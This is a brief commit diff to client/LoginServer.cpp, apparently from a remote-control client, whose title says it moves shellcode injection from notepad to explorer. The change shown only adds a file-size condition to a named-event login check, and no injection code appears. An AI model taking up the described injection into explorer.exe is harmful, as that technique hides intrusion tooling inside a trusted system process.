TestRun: Change inject shellcode to explorer <- notepad

client/LoginServer.cpp

@@ -336,7 +336,9 @@ LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, CONNECT_ADDRESS& conn, BOOL& isAuthKerne
     std::string pid = std::to_string(GetCurrentProcessId());
     HANDLE hEvent1 = OpenEventA(SYNCHRONIZE, FALSE, std::string("YAMA_" + pid).c_str());
     HANDLE hEvent2 = OpenEventA(SYNCHRONIZE, FALSE, std::string("EVENT_" + pid).c_str());
-    if (hEvent1 != NULL || hEvent2 != NULL)
+    WIN32_FILE_ATTRIBUTE_DATA fileInfo;
+    GetFileAttributesExA(buf, GetFileExInfoStandard, &fileInfo);
+    if ((hEvent1 != NULL || hEvent2 != NULL) && fileInfo.nFileSizeLow > 16 * 1024 * 1024)
     {
         Mprintf("Check event handle: %d, %d\n", hEvent1 != NULL, hEvent2 != NULL);
 		isAuthKernel = TRUE;